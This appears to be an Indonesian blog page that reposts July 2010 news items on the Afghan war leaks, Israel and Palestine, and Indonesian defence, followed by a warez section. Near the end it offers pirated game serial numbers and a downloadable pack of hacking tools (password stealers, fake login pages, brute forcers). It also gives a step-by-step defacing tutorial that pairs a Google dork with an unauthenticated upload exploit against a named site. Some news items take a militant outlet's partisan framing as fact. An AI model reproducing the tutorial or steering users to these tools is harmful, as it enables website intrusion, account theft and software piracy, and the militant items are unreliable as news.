Rahasia Dokumen Militer AS Soal Perang Afghanistan

Prajurit AS Private Trebor Moore dari First Platoon Bravo Troop of First Squadron, 71st Cavalry berjalan melewati anak muda pengembala domba saat melakukan patroli di Distrik Dand, Provinsi Kandahar, 21 Juli 2010. NATO dan AS menempatkan 143.000 prajurit di Afghanistan, akan ditambah lagi hingga mencapai 150,000 prajurit. (Foto: Getty Images)

26 Juli 2010, Jakarta -- Sebuah Situs bernama Wikileaks berhasil mempublikasikan lebih dari 90.000 dokumen militer Amerika Serikat (AS) yang melaporkan perincian tersembunyi perang Afghanistan, termasuk pembunuhan warga sipil.

Ini adalah kebocoran dokumen rahasia terbesar sepanjang sejarah militer AS dan pihak ‘Gedung Putih’ mengutuk pembocoran dokumen ini sebagai perbuatan yang ‘tidak bertanggung jawab’.

Tiga surat kabar, seperti The Guardian (Inggris), New York Times (AS), dan Der Spiegel (Jerman) melaporkan bahwa kebocoran itu mengungkapkan keprihatinan NATO terhadap Pakistan dan Iran yang dianggap membantu pemberontakan Taliban di Afghanistan.

Namun Duta Besar Pakistan di Washington, Hussain Haqqani menegaskan bahwa laporan-laporan dalam dokumen itu tidak sesuai dengan kenyataan di lapangan. “AS, Afghanistan dan Pakistan adalah mitra strategis untuk bersama-sama mengalahkan Al Qaeda dan sekutunya Taliban baik secara militer dan politik,” kata Haqqani.

Wartawan diplomatik BBC, Bridget Kendall mengatakan meski dokumen itu tidak mengungkapkan laporan dramatis terbaru, dokumen itu menunjukkan kesulitan mereka dalam perang yang kerap menorbankan warga sipil. Dalam sebuah pernyataan resmi, penasihat keamanan nasional pemerintah AS Jenderal James Jones mengecap publikasi dokumen-dokumen militer itu.

Jones mengatakan, informasi rahasia seperti itu bisa membahayakan tidak hanya untuk nyawa prajurit Amerika dan sekutunya tapi juga membayakan keamanan nasional AS. Jones menambahkan dokumen-dokumen tersebut berasal dari tahun antara 2004-2009, sebelum Presiden Barack Obama menyampaikan strategi baru perang Afghanistan yang diikuti penambahan personil militer di negeri itu.

Seorang pejabat tinggi AS mengatakan, bahwa situs Wikileak mempublikasikan materi-materi rahasia yang tidak dikonsumsikan secara publik dan bukanlah konsumsi pemberitaan. Pejabat itu bahkan menyebut Wikileaks sebagai sebuah organisasi yang menentang kebijakan pemerintah AS di Afghanistan.

Dalam situs itu, terdapat serangkaian dokumen bertajuk ‘Buku harian Perang Afghanistan’, dimana terdapat penundaan publikasi sekitar 15.000 laporan sebagai proses untuk mengurangi kerusakan yang diminta beberapa sumber.

Sedangkan The Guardian dan New York Times, yang mempublikasikan laporan Wikileaks itu, mengatakan tidak pernah berhubungan langsung dengan sumber pembocor dokumen itu. Mereka hanya menghabiskan waktu beberapa pekan untuk melakukan konfirmasi soal
kebenaran informasi tersebut.

Publikasi ribuan dokumen itu muncul ketika NATO tengah melakukan investigasi tewasnya 45 orang warga sipil Afghanistan akibat serangan udara NATO di Provinsi Helmand, pekan lalu. Pun demikian, dalam ivestigasi awalnya, NATO tidak menemukan bukti adanya kesalahan misi.

Tapi seorang wartawan BBC yang sempat mewawancarai beberapa orang penduduk desa Regey menemukan pengakuan bahwa banyak warga yang menyaksikan insiden itu. Mereka mengatakan serangan itu dilancarkan siang hari saat puluhan orang berlindung dari sengitnya pertempuran di desa tetangga, Joshani.

Namun sekali lagi, Juru bicara NATO, Letkol Chris Hughes berkilah degan mengatakan bahwa pasukan multi nasional sudah melakukan kerja luar biasa untuk mengindari korban dari warga sipil. “Keselamatan warga sipil Afganistan sangat penting bagi pasukan bantuan keamanan Internasional,” kilah Hughes.

Pos Kota

Hamas: Penghancuran Araqib di Nagev Kejahatan Ras Habisi Etnis Arab


Damascus – Gerakan perlawanan Islam Hamas mengutuk keras kejahatan rasial Zionis yang menghancurkan rumah-rumah warga di Araqib, menumbangkan pepohonanya dan mengusir penduduknya yang berjumlah 700 jiwa. Setelah sebelumnya mereka menganiaya wanita dan anak-anak dengan senjata.

Dalam penjelasanya, Selasa (27/6) yang dilansir infopalestina Hamas mengatakan, kejahatan Zionis tersebut merupakan pembersihan etnis (cleansing etnic) untuk mengusir warga Arab dari tanah waritsan nenek moyangnya dengan berbagai alasan yang dibuat-buat.

Dalam pada itu, Hamas memuji perjuangan warga Araqib dalam melawan kesewenang-wenangan pemerintah Israel. Ia mengajak seluruh rakyat Palestina bersatupadu bersolidaritas terhadap warga Araqib dan mengadakan perlawanan terhadap kejahatan tersebut. Tak kurang dari 45 desa Arab lainya di Nagev menjadi target cleansing etnis Israel.

Dalam pada itu, Hamas meminta Liga Arab dan PBB melakukan tanggung jawabnya menghentikna kejahatan Zionis tersebut yang sudah sangat melewati batas.

(asy)Infopalestina.com/ms

TNI Tingkatkan Penjagaan Tiga Pulau Terluar Sumatera

Pulau NipahKomando Daerah Militer I Bukit Barisan (Kodam I/BB) meningkatkan pengamanan terhadap tiga pulau terluar Sumatera yakni Pulau Nipa, Pulau Sekatung, dan Pulau Berhala.

Panglima Kodam I/BB, Bigadir Jenderal TNI, Leo Sigers, Senin (26/7) mengatakan, bentuk pengamanan tersebut dengan menempatkan sedikitnya 34 prajurit TNI baik dari Angkatan Darat, Angkatan Udara, dan Marinir yang dipersenjatai lengkap.

Ketiga pulau terluar tersebut kata Sigers, merupakan wilayah strategis, karena berada dijalur Selat Malaka dan perairan internasional, sehingga menjadi ancaman jika sampai diambil oleh negara tetangga seperti Malaysia, Singapura, atau Australia.

“Negara luar sangat berminat dengan ketiga pulau kita ini. Jadi supaya tidak terjadi hal yang tidak diinginkan, kita tempatkan prajurit di sana, ” jelasnya.

Selain menempatkan prajurit, sebuah tugu dan prasasti juga dipasang, sebagai bukti bahwa pulau itu milik Negara Kesatuan Republik Indonesia (NKRI).

Sigers menambahkan prajurit TNI juga melakukan pelestarian lingkungan di tiga pulau tersebut. Salah satu yang dilakukan dengan mengembangbiakkan anak penyu asal dari Australia dan Singapura di Pulau Berhala.

“Kita mengembangbiakkan anak penyu agar bisa menjadi obyek wisata. Setiap malamnya ada tiga induk yang bertelur. Jumlahnya sampai 120 butir, ” katanya.

Jurnas

Korsel Coba Gandeng Turki dalam Proyek KF-X


26 Juli 2010 – Korea Selatan masih mencari patner dalam program pengembangan jet tempur KF-X.

Setelah minggu lalu, Korsel dan Indonesia menandatangani MoU (Memorandum of Understanding) KF-X, dimana Indonesia akan menanggung hingga 20% biaya pengembangan. Korsel juga sedang bernegosiasi dengan Turki agar berpartisipasi dalam proyek KF-X.

Pemerintah Korsel berharap dapat mengandeng perusahaan pertahanan negara Barat sebagai partner dalam proyek ini.

Boeing, Lockheed Martin dan konsorsium Eurofighter terlibat dalam diskusi awal dan dapat menjadi partner pengembangan KF-X. Korsel bersama Lockheed Martin mengembangkan dan memproduksi jet tempur latih T-50.

Korean Aerospace Industries (KAI) diharapkan memproduksi KF-X di fasilitasnya di Sacheon.

Kesepakatan pemerintah dengan Korsel dapat membantu menghidupkan kembali PT. DI dalam memproduksi pesawat militer. Kerjasama pertahanan Indonesi-Turki dapat mempermulus program KF-X, jika Turki tertarik bergabung.

Prototipe pertama diharapkan terbang sekitar 2020, direncanakan Indonesia akan memperoleh 50 pesawat sedangkan Korsel 100 pesawat.

Flight Global/Berita HanKam

LIPI Pamerkan Radar Buatan Indonesia


Balai Konservasi Biota Laut LIPI Ambon akan memamerkan radar buatan Indonesia dalam acara Maluku Expo, 31 Juli-5 Agustus, di Lapangan Merdeka, yang diadakan sebagai bagian pelayaran internasional Sail Banda.

“Karena Maluku adalah daerah kepulauan, maka kebutuhan akan sarana komunikasi sangatlah penting. Untuk itu, kami akan memamerkan contoh radar yang dibuat LIPI dan bisa digunakan untuk sistem navigasi maupun komunikasi,” kata Kepala LIPI Ambon, Augy Syahailatua, Senin (26/7/2010).

Menurut dia, selama ini radar yang digunakan di Indonesia merupakan barang impor. Untuk itu, LIPI mencoba membuat satu terobosan yang akan diperkenalkan di Maluku. “Radar buatan LIPI merupakan yang pertama dibuat Indonesia dan dapat dibeli dengan harga yang lebih terjangkau,” katanya.

Selain memamerkan radar buatannya, LIPI juga akan menampilkan hasil penelitiannya dan berbagai mesin teknologi tepat guna untuk mengolah bahan makanan menjadi produk bernilai ekonomis.

“Kami akan menampilkan berbagai cara pengolahan makanan, seperti abon, kerupuk ikan, dendeng, dan lain-lain, dengan metode yang lebih baik dan hemat yang sebelumnya sudah dilakukan oleh Balai Besar Pengembangan Teknologi Tepat Guna LIPI,” kata Syahailatua.

Ia menjelaskan, pihaknya juga akan menyiapkan KM Riset Baruna Jaya VII untuk diikutsertakan dalam Parade Kapal Riset pada pameran yang akan berlangsung pada 31 Juli-5 Agustus mendatang.

“Kapal itu juga akan digunakan untuk mengakomodasikan 30 pelajar SMA dan mahasiswa se-Kota Ambon untuk mengikuti pelayaran Remaja Bahari Lintas Nusantara pada awal Agustus mendatang,” ujarnya.

Pelayaran pendek selama lima hari melintasi Kepulauan Lease dan Pulau Banda, Kabupaten Maluku Tengah, itu akan diisi dengan sosialisasi pelestarian daerah pesisir dan laut, serta pertandingan voli dan sepak bola antarpeserta dengan penduduk setempat untuk menjalin kebersamaan.

“Selain informasi bagaimana caranya menjaga terumbu karang, padang lamun, ekosistem mangrove, dan sebagainya di daerah masing-masing, kami juga akan memberikan metode dan cara pengolahan makanan bernilai ekonomis dengan lebih hemat kepada masyarakat yang disinggahi,” katanya.

SURYA Online

Ha'aretz: Penyiksaan Fisik dan Psikis di Penjara-penjara Israel


Yerusalem – Koran Israel berbahasa Ibrani "Haaretz" pada Senin (26/7) menyebutkan bahwa para interogator Zionis dari dinas intelijen "Shin Bet" menggunakan tekanan psikologis dan penyiksaan fisik untuk mengorek informasi dan pengakuan dari para tahanan Palestina di penjara-penjara Israel.

Surat kabar Israel ini menyatakan bahwa kondisi seorang tahanan tidak akan membaik sampai dia mau membuat pengakuan, meskipun itu dilakukan secara terpaksa.

Surat kabar "Ha'aretz" mengutip dari jumlah orang yang diinterogasi penyidik Shin Bet, mereka menegaskan bahwa para interrogator mengumpat mereka dengan kata-kata keji, kotor dan cabul. Mengancam mereka akan menodai kehormatan mereka dan istri-istri mereka serta mecemarkan kredibilitas mereka. Dalam pemeriksaan para interrogator ini menggunakan bahasa Arab dengan fasih, ungkap Ha’aretz.

Menurut salah satu tahanan bahwa dia mengalami penyiksaan secara fisik. Dia ditempatkan di sebuah ruang yang luasnya tidak lebih dari dua meter persegi. Di salah satu sudutnya ada toilet dan keran yang mengeluarkan air hanya 10 detik setelah ditekad. Dia tinggal di ruang tersebut tidak tahu malam atau siang, karena tidak ada apapun untuk menunjukkan waktu.

(asw)Infopalestina.com/ms

AS-Korsel Mulai Gelar Latma Udara Laut

Awak kapal induk tenaga nuklir USS George Washington bekerja di ruangan Combat Defense Centre saat latma Invincible Spirit di perairan Korea Selatan, 25 Juli 2010. (Foto: Reuters)


25 Juli 2010 -- Amerika Serikat dan Korea Selatan memulai latihan bersama udara dan laut skala besar di Semenanjung Korea, Minggu (25/7). Latma diberinama "Invincible Spirit" berlangsung empat hari, sebelumnya dijadwalkan berlangsung 8-11 Juni tetapi ditunda menunggu resolusi PBB terkait insiden tenggelamnya korvet AL Korsel Cheonan 26 Maret 2010.

Latma ini ditujukan memberikan isyarat kuat pada Korea Utara yang dituduh menembakan torpedo ke Cheonan sehingga tenggelam dan menewaskan 46 pelaut.

Amerika Serikat menurunkan kapal induk tenaga nuklir kelas Nimitz USS George Washington 97.000 ton yang menjadi salah satu simbol kekuatan militer AS. USS George Washington membawa satuan udaranya sekitar 80 pesawat, diantaranya F/A-18E/F Super Hornet, EA-6B Prowler, E-2C Hawkeye. Sekitar 8000 personil dari kedua negara, 20 kapal perang dan lebih dari 200 pesawat terlibat dalam latma ini. Jet tempur siluman F-22 Raptor akan melakukan misi terbang pertama kalinya di udara Korea.

Korea Selatan menyertakan LHD Dokdo 14.000 ton, kapal perusak kelas KDX-II 4500 ton, kapal selam kelas Son Won-il 1800 ton dan jet tempur F-15K.

Dalam latma akan dilakukan latihan penembakan artileri, menjatuhkan bom anti kapal selam dan ranjau laut serta pengisian bahan bakar di udara. Latihan ini ditujukan mencegah terulangnya insiden seperti Cheonan.

Jepang mengirimkan pengamat dalam latma ini karena sangat sensitif terkait isu ancaman Korea Utara. Pengiriman pengamat militer Jepang pada latma gabungan AS dan Korsel untuk pertama kalinya.



Jet tempur F/A-18E/F Super Hornet AL AS lepas landas dari kapal induk tenaga nuklir kelas Nimitz USS George Washington dalam latihan bersama udara dan laut Amerika Serikat dan Korea Selatan. (Foto: Reuters)


Awak darat mengecek kesiapan pesawat EA-6B Prowler di atas dek kapal induk tenaga nuklir USS George Washington saat mengikuti latma Invincible Spirit di perairan Korea Selatan, 25 Juli 2010. (Foto: Reuters)



Awak darat mengecek kesiapan pesawat E-3C Hawkeye di atas dek kapal induk tenaga nuklir USS George Washington saat mengikuti latma Invincible Spirit di perairan Korea Selatan, 25 Juli 2010. Pesawat ini mampu beroperasi sejauh 1000 km. (Foto: Reuters)


YONHAP/Berita Hankam

OMMA : 10 Tank Dihantam Bom, 30 Tentara Salibis AS Tewas di Helmand

AFGHANISTAN (Arrahmah.com) - Sebanyak 30 tentara salibis AS tewas atau terluka sepanjang hari kemarin saat ledakan bom ranjau menghantam dan menghancurkan 10 tank mereka yang melakukan patroli dari Nowzad sampai Gerishk di provinsi Helmand.

Mujahidin Imarah Islam Afghanistan menembak jatuh helikopter militer AS di kota Lashkar Gah pada Kamis (22/7) sore sekitar pukul 16.00. Mujahidin melaporkan bahwa enam tentara salibis AS tewas seketika saat helikopter menghantam tanah.

Empat tentara teroris AS tewas dan tiga lebih terluka pada Kamis pagi saat dua bom meledak menargetkan patroli berjalan kaki tentara salibis di distrik sangin, provinsi Helmand.

Mujahidin menyerang konvoy militer musuh di kota Lashkar Gah, provinsi Helmand. Sekitar 9 tentara salibis NATO tewas dan terluka dalam serangan ini, empat tank dan kendaraan militer berhasil dihancurkan mujahidin.

Kamis pagi, Mujahidin di provinsi Uruzgan, kota Tarin Kot, terlibat bentrokan fisik dengan tentara salibis AS. Berdasarkan laporan mujahidin, tentara musuh melarikan diri dari wilayah pertempuran dan meninggalkan sejumlah amunisi dan persenjataan. Tidak jelas berapa jumlah korban tewas dan terluka di kubu musuh, namun kubu mujahidin tidak mengalami kerugian.

Dua tentara teroris AS tewas, tiga terluka saat patroli mereka mendapat serangan mendadak dari mujahidin di distrik Baraki Barak, provinsi Logar. PEristiwa terjadi Kamis pagi sekitar pukul 8.00 waktu setempat.

Mujahidin Imarah Islam Afghanistan menyerang konvoy militer AS di distrik Sayedabad, provinsi Wardak, menewaskan tiga tentara salibis dan melukai 5 lebih. Dua tank musuh ikut dihancurkan dalam serangan ini.

(haninmazaya/arrahmah.com)

Dalam Sehari 9 Penduduk Palestina Ditangkap di Tepi Barat

AL-KHALIL - Penangkapan demi penangkapan terus dilakukan militer zionis Israel, tanpa alasan jelas, Muslim Palestina mereka tangkap dengan perlakukan kasar dan dibawa ke sebuah tempat yang tidak diketahui.

Kali ini tentara Zionis menangkap tiga orang yang melakukan demonstrasi memprotes pencaplokan wilayah yang terus dilakukan Israel di wilayah Tepi Barat.

Pada Jumat (23/7/2010), ratusan penduduk Palestina melakukan unjuk rasa memprotes pembangunan perumahan baru yang tentu saja ilegal di tanah milik Palestina di al-Khalil, lapor AFP.

Tanah yang terletak dekat dengan perumahan ilegal Kyriat Arba, merupakan tempat tinggal sekitar 6.500 penduduk Palestina.

Masih dihari yang sama, tentara zionis juga menangkap empat Muslim Palestina saat mereka menyerang perumahan Palestina di selatan Tepi Barat.

Dalam peristiwa lainnya, seorang Palestina terluka dan dua orang ditangkap saat melakukan unjuk rasa memprotes pembangunan dinding pemisah di desa Bil'in, barat Ramallah.

Puluhan penduduk Palestina turun ke jalan melakukan aksi protes menentang pembangunan dinding pemisah.

(haninmazaya/arrahmah.com)

Pejuang Gaza Tembakkan Empat Roket ke Israel

Jerusalem, (tvOne).

Sebanyak empat roket berhasil ditembakkan oleh para pejuang Gaza ke Israel Selatan akhir pekan ini, seperti dikatakan seorang juru bicara militer, Minggu, (25/7).

Tak satupun dari roket-roket itu menimbulkan korban atau kerusakan properti, kata juru bicara itu dan menambahkan bahwa sejak awal tahun ini sekitar 90 roket atau peluru mortir ditembakkan ke Israel selatan.

Pada Desember 2008, Israel melancarkan serangan ke Gaza dalam usaha menghentikan serangan roket hampir setiap hari dari wilayah Palestina yang diblokade itu.

Sekitar 1.400 warga Palestina dan 13 warga Israel tewas dalam serangan 22 hari itu. Setelah setahun tenang menyusul serangan itu, para pejuang Gaza baru-baru ini meningkatkan serangan roket lintas perbatasan. (Ant)

(tvOne)

Pakistan Ringkus Kelompok Hacker Terkenal

ISLAMABAD - Pihak berwenang Pakistan mengatakan pada hari Kamis mereka telah melacak sekelompok hacker dan menangkap lima tersangka yang terlibat dalam mengganti tampilan situ (deface) ribuan situs domestik dan internasional.
Para "hacker internasional" ditangkap dalam sebuah operasi skala negara selama beberapa minggu terakhir, kata perwira senior Federal Investigation Agency (FIA) Mian Idrees kepada AFP.

"Kami telah menangkap kelompok hacker terkenal '' Pakbugs 'dan menangkap lima anggota kelompok ini," katanya.

Pihak berwenang menyita komputer dan peralatan lainnya yang digunakan dalam berbagai kejahatan cyber, katanya.

FIA mengatakan dalam pernyataannya jika kelompok itu terlibat dalam kegiatan hacking dan mengotori ribuan situs web milik pemerintah, non-pemerintah dan organisasi internasional.

"Mereka juga terlibat dalam pembajakan kartu kredit dan penggunaan kartu kredit hasil curian," katanya.

"Pakbugs" didirikan Jawad Ihsan, alias Humza, kelompok ini diyakini berbasis di Arab Saudi, kata pernyataan itu.

Disebutkan, co-founder kelompok itu Hassan Khan telah ditahan di Pakistan barat laut kota Peshawar, bersama dengan anggota lain di Lahore, Bannu dan Rawalpindi.

Namun, Idrees menolak keterlibatan para hacker tersebut dalam terorisme dan mengatakan, para pria itu dikenakan hanya dengan uu kejahatan elektronik.

Pakistan saat ini sedang memerangi terorisme dan kejahatan teknologi tinggi, pada tahun 2008 menyatakan cyber-terorisme adalah kejahatan besar, sedangkan penipuan elektronik bisa diancam dengan hukuman penjara tujuh sampai sepuluh tahun.

[muslimdaily.net/dwn]

LAPAN Akan Bangun Stasiun Peluncuran Satelit


22 Juli 2010, Bengkulu -- Lembaga Penerbangan dan Antariksa Nasional akan membangun stasiun peluncuran satelit di Pulau Enggano, Kecamatan Enggano, Kabupaten Bengkulu Utara.

Rencana itu disampaikan Sekretaris Utama LAPAN Bambang Kusumanto usai menggelar pertemuan dengan Gubernur Bengkulu Agusrin Najamudin di Gedung Daerah, Bengkulu, Kamis.

"Pertemuan hari ini untuk mematangkan rencana pembangunan stasiun peluncuran satelit di Pulau Enggano dan kami membutuhkan dukungan dari pemerintah daerah," katanya kepada wartawan.

Bambang mengatakan untuk tahap pertama akan dilakukan penandatanganan nota kesepakatan antara Pemerintah Provinsi Bengkulu dengan LAPAN pada 2 Agustus di Jakarta.

Selanjutnya, kata dia, akan dibentuk tim untuk melakukan sejumlah kajian dan survei untuk menentukan lokasi pembangunan stasiun peluncuran.

"Kami akan membuat studi kelayakan yang membutuhkan waktu enam bulan, kemudian analisis mengenai dampak lingkungan dan diharapkan pada 2011 sudah dimulai pembangunan fisik," katanya.

Selama ini, kata Bambang, LAPAN meluncurkan satelit ke sejumlah orbit melalui stasiun peluncuran Pameungpeuk, Kabupaten Garut, Provinsi Jawa Barat.

Namun kapasitas stasiun peluncuran roket tersebut terbatas seiring dengan peningkatan jumlah penduduk di sekitar lokasi peluncuran sehingga menimbulkan risiko yang lebih besar.

"Stasiun peluncuran di Enggano ini rencananya lebih besar dari kapasitas di Pameungpeuk dan lokasinya juga strategis dan penduduknya masih sedikit," katanya.

Sementara itu Gubernur Bengkulu Agusrin Najamudin menyambut baik rencana LAPAN tersebut karena akan membantu pemerintah dalam mengawasi pulau terluar itu.

"Kami mendukung penuh rencana ini dan akan disosialisasikan kepada masyarakat di Pulau Enggano bahwa keberadaan stasiun peluncuran satelit ini tidak membahayakan jiwa mereka," katanya.

Agusrin mengatakan luas areal yang dibutuhkan untuk membangun stasiun tersebut sekitar 200 hektare (ha) dari 40 ribu ha luas pulau yang berjarak 106 mil dari Kota Bengkulu itu.

Pulau Enggano merupakan salah satu pulau terluar Indonesia yang dihuni lebih dari 2.600 jiwa masyarakat adat yang terbagi dalam lima suku besar yakni Kaitora, Kaahua, Kauno, Kaharuba dan Kaharubi.

ANTARA News

Satu Gugur Syahid Akibat Rudal Israel di Khanyunis


Gaza – Seorang mujahid dari brigade Al-Quds, sayap militer gerakan Jihad Islam, Kamis (22/7) meninggal syahid, akibat luka yang dideritanya, terkena tembakan rudal Zionis ke sebelah timur Khanyunis, selatan Gaza.

Dengan gugurnya anggota brigade JI ini, jumlah korban syuhada yang meninggal akibat gempuran Israel dalam 24 jam ini bertambah menjadi empat orang.

Sementara itu, menurut sumber di Jihad Islam mengatakan, anggotanya yang bernama, hatim Muhammad Bardawil (21 tahun) dari kamp pengungsian Khanyunis akhirnya gugur sebagai syuhada menyusul luka-lukanya yang parah akibat tembakan rudal Israel di distrik Qararah, kemarin sore.

Sumber lokal menyebutkan, sebelumnya tank-tank Israel melessakan rudal mereka ke areal pertanian di Qararah, akibatnya seorang mejahid perlawanan terluka. Walau tim medis sudah berusaha mengevakuasi korban ke rumah sakit Nasher, namun karena luka-lukanya yang cukup parah, ia tak bisa terselamakan. Hingga kini, wilayah tersebut masih diwarnai ketegangan.

Dengan meninggalnya mujahid Bardawil, jumlah korban syahid akibat gempuran Israel bertamnbah menjadi empat orang. Yaitu, Muhammad hatim Shabri Kafaranah (23 tahun), Qasim Kamal Shanbari (20 tahun), Bilal Mahmud Abu Lubdah (23 tahun) dan terakhir Muhammad Bardawil (21 tahun). (asy)

Infopalestina.com/ms

KRI Soeharso Bertolak ke Masohi


23 Juli 2010, Ambon -- Kapal Rumah Sakit terbesar Indonesia, KRI dr. Soeharso SHS-990, berlayar menuju Masohi, ibu kota kabupaten Maluku Tengah, Kamis, untuk melanjutkan misi kemanusiaan dengan nama sandi operasi Bhakti Surya Bhaskara Jaya.

Operasi ini diprogramkan dalam kegiatan pelayaran internasional, Sail Banda
2010 yang digelar di Maluku, 24 Juli-17 Agustus.

Siaran pers dari Mayor Laut (E) Wahyu Broto selaku Petugas Dinas Penerangan (Dispen) Pangkalan Utama TNI Angkatan Laut (Lantamal) IX Ambon menyatakan KRI Soeharso bertolak meninggalkan Dermaga Irian Desa Halong menuju Masohi untuk melanjutkan pengobatan gratis kepada masyarakat setempat.

“Semua pasien yang selama ini dirawat di kamar-kamar KRI Soeharso sudah
diijinkan pulang ke daerah asal masing-masing sebelum kapal itu meninggalkan dermaga,” kata Wahyu.

Sebelumnya, KRI Soeharso telah memberikan pengobatan masal di Namlea, ibu kota kabupaten Buru dan beberapa desa di Pulau Ambon, yakni Liang, Waai, Passo dan Hutumuri.

Di Kabupaten Buru, pelayanan kesehatan gratis berlangsung selama tiga hari,
yakni 11 – 13 Juli. Sedangkan di Desa Liang, Waai, Passo dan Hutumuri masing-masing berlangsung hanya dua hari yang dimulai 15 – 22 Juli.

Di beberapa titik sasaran SBJ tersebut, baru Desa Hutumuri yang mendapatpelayanan lengkap dari komponen-komponen program SBJ di Maluku. Komponen-komponen itu yakni pengobatan gratis, pembangunan fisik dan non fisik.

Pembangunan fisik meliputi perbaikan sarana umum, yakni renovasi atap plafon dan lantai keramik di SMA Negeri 8 dan SD Kristen 1 Hutumuri.

Sedangkan non fisik berupa penyuluhan kesehatan tentang bahaya narkoba dan HIV/ Aids yang dilaksanakan di SMA Negeri 8 Hutumuri dengan menghadirkan Letda Laut (K) Rofiq Muhamsah sebagai pemateri.

Wahyu Broto mengatakan, setelah melaksanakan bhakti sosial di Masohi, KRI
Soeharso akan bertolak menuju Pulau Banda untuk melanjutkan misi yang sama.

Sesuai jadwal, pelayanan kesehatan gratis KRI Soeharso kepada masyarakat
Banda akan berlangsung 26 – 28 Juli.

ANTARA Maluku

AS Kembali Kerja Sama Dengan Kopassus

KopassusJAKARTA — Amerika Serikat (AS) mengumumkan, negara itu melanjutkan hubungan militer dengan Kopassus, pasukan khusus Indonesia, setelah jeda selama 12 tahun. Hal itu dinyatakan dalam kunjungan Menteri Pertahanan Amerika Serikat Robert Gates yang tiba di Jakarta, Kamis (22/7/2010) siang.

“Kami akan memulai sebuah tahap, proses yang terukur untuk bekerja sama dengan Kopassus,” kata seorang pejabat senior pertahanan AS. Kerja sama militer AS dengan Kopassus dibekukan Washington tahun 1998.

Pejabat AS itu kepada AFP mengatakan, “Keputusan itu dibuat dalam terang kemajuan bahwa Indonesia dan militernya telah membuat reformasi dan profesionalisasi sejak jatuhnya Soeharto serta janji-janji baru tentang reformasi.”

AS ingin melanjutkan pelatihan bagi pasukan khusus sebagai bagian dari kerja sama yang terus meningkat dalam bidang kontra-pemberontakan dan intelijen dengan Jakarta. Namun, langkah itu akan menjadi kontroversial karena Kopassus pada masa lalu dinilai AS terlibat dalam pelanggaran hak asasi manusia, termasuk di Timor Timur.

AS memutus hubungan dengan Kopassus tahun 1998 berdasarkan hukum negara itu yang melarang kerja sama dengan tentara asing yang terlibat dalam pelanggaran hak asasi manusia. Kopassus oleh AS dituduh melakukan pelanggaran di Timor Timur dan Aceh pada masa Presiden Soeharto tahun 1990-an.

Namun, pemerintahan Presiden Barack Obama, yang menghabiskan sebagian masa kecilnya di Indonesia, melihat Indonesia sebagai pemain yang semakin penting di Asia Timur dan sekutu penting di dunia Muslim.

Kompas

10 stadion termahal di Dunia

Berikut adalah daftar 10 stadion termahal di Dunia :

1

1. Wembley Stadium / London, England / $1.5 billion


2

2. Olympic Stadium / Montreal, Canada / $1.4 billion

3

3. Madison Square Garden / New York, USA / $1.1 billion

4

4. Stade de France / Paris, France / $974 million

5

5. Rogers Centre / Toronto, Canada / $930 million

6

6. The Emirates Stadium / London, England / $770 million

7

7. Soldier Field / Chicago, USA / $714 million


8

8. Safeco Field / Seattle, USA / $656 million

2440386162_097af0048b

9. Lucas Oil Stadium / Indianapolis, USA / $675 million

10
10. ANZ Stadium / Sydney Australia / $624 million

Referensi : http://lilomag.com

1500 Serial Number - Various Games Part I

1500 Serial Number
Category : SN game

File Size : 36.96 KB

Click Here To Download

Best - Hacking Tools



MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head ~censored~ HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
MessenPass
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSN
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B-S Spy
Saria Fake Logins

Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S-H Yahoo Password Sender

NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute Forcer


Page 5:

Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb Attacker

Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus Cleaner
MSN Dondurucu

File Size : 32.682 KB

Click Here To Download

Autorun Virus Remover v.2.3.0320


* Pen drive
* USB stick
* USB Flash kartu
* USB MP3 players
* USB Audio pemain

* Eksternal hard drive
* Pocket PC
* Ponsel
* IPod dan iPhone
* USB mass storage lain

File Size : 3.07 MB

Click Here To Download

Menyembunyikan Recycle Bin ^-^

------------
------------
1. Buka registry editor.
2. Cari lokasi desktop name space'y :
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace
3. TINGGAL RENAMA DEH NAMA FILE'Y
{645FF040-5081-101B-9F08-00AA002F954E}
[Menjadi]--->
{645FF040-5081-101B-9F08-00AA002F954E-HIDDEN}
Selesai
4. Close regisrty dan tekan F5 untuk refresh
------------
------------
S'moga bermanfaat bodoh

Tutorial - Simple Defacing ^-^

Simple Defacing :) Tutorial
sebelum kegiatan alangkah baik'y berdoa dolo
ok langsung z ke Tkp ^-^

Dork = allinurl:"/cgi-bin/ourspace
exploid = /cgi-bin/ourspace/newswire/uploadmedia.cgi

- Buka google = masukan dork tadi
- Example target : http://www.israelbego.com/cgi-bin/ourspace//login.cgi
- Hapus /cgi-bin/ourspace//login.cgi
- & kemudian ganti dengan Exploit
- Jadi : http://www.israelbego.com/cgi-bin/ourspace/newswire/uploadmedia.cgi
- Enter dah tu Url (abrakadabraaaaaa...)

Wihh gi beruntung nih ente d beri akses upload file tanpa harus login ^-^.....
skarang upload file Html kamu (H4ck By _ _ _ _)

Enjoy defacing

Dreamweaver CS5 For Dummies

Dreamweaver CS5 For Dummies
English | ISBN: 047061076X
Format File : PDF
Total Page : 460 Pages

File Size : 10.7 MB

Click Here To Download

